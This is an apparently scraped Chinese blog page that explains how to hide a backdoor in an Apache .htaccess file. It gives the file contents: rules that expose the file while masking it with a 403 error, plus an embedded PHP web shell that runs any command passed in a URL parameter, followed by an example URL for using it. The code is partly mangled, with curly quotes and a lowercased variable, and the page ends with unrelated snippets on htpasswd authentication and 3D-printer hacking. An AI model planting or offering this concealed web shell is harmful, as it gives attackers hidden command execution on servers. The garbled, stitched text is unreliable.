用 htaccess做更隱蔽的後門

2021-09-21 21:07:06 字數 379 閱讀 6445

from:

萬惡的引用功能,下文複製貼上無用,請自行將雙引號修改

.htaccess內容如下

#首先允許web訪問這個檔案

order allow,deny

allow from all

redirectmatch 403 .htaccess$

#.htaccess結尾的403錯誤,這裡是為了增加隱蔽性

### shell ### <?php echo 「\n」;passthru($_get['c'].」 2>&1″); ?>### kindle ###

#惡意的php**

使用方法:http://localhost/.htaccess/?c=di

用Apache的 htaccess檔案增加使用者認證

有時候某些目錄下的檔案需要增加認證,apache預設的認證模組都是很完備的,以下就是乙個通過.htaccess檔案增加使用者認證的例子。即使對於虛擬主機使用者也可以通過上傳一些檔案來實現認證控制。首先用htpasswd建立乙個密碼檔案 比如檔名叫做my.passwd home apache bin ...

用Apache的HTACCESS保護密碼

在staging模式中,如果想讓 上的指定目錄對某些人開放,可以對站點使用密碼保護方法 使用htpasswd檔案來實現。密碼檔案用於儲存有效的需要訪問 目錄的使用者名稱和密碼資訊。基本上,apache提供了乙個程式來建立密碼檔案,即htpasswd程式。在apache安裝後的bin目錄下有,比如wi...

更隱蔽的黑客攻擊 篡改3D列印檔案摧毀無人機

通常網路攻擊的傾向於竊取個人資訊或盜竊銀行賬戶以便從中獲利,很少人會將黑客和3d列印聯想到一起。乙個國際研究小組正在研究黑客入侵3d印表機的可能性。起初,他們3d印表機似乎不會很容易受到攻擊,但這個看法很快就改變了。此次代號為dr0wned的行動,研究人員沒有採取直接攻擊機器使其不能正常運作,而是利...